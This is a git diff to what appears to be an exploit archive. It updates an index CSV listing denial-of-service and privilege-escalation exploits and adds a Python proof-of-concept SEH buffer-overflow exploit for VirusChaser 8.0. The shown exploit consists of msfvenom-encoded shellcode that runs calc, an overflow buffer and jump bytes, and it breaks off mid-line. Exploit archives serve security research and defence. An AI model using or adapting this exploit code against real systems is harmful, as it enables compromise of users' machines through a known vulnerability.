diff --git a/files.csv b/files.csv index d91439d94..98e4d0ecc 100644 --- a/files.csv +++ b/files.csv @@ -269,7 +269,7 @@ id,file,description,date,author,platform,type,port 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 -1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0 +1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 @@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0 +41887,platforms/windows/local/41887.txt,"VirusChaser 8.0 - Buffer Overflow (SEH)",2017-04-14,0x41Li,windows,local,0 41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 diff --git a/platforms/windows/local/41887.txt b/platforms/windows/local/41887.txt new file mode 100755 index 000000000..5b14fe5f3 --- /dev/null +++ b/platforms/windows/local/41887.txt @@ -0,0 +1,34 @@ +# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow +# Date: 14 April 2017 +# Exploit Author: 0x41Li (0x41Li.D@gmail.com) +# Vendor Homepage: https://www.viruschaser.com/ +# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip +# Tested on: Windows 7 (Universal) + +import os +from struct import pack + +## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b '\x00\x0d\x0a\x09\x22' -f c # x86/shikata_ga_nai succeeded with size 216 ## BADCHARS = \x00\x0d\x0a\x09 AVOIDED = \x22 = " (Cut the buffer) +shellcode= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" + "\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83" + "\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe" + "\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd" + "\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5" + "\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e" + "\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f" + "\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77" + "\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e" + "\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40" + "\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70" + "\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc" + "\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17" + "\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8" + "\xae\xc2\x28\x4b\x32\x05") + +junk = "A"*688 +jmp ="\xeb\x0b\x41\x41" ## JMP 0B +ret = pack('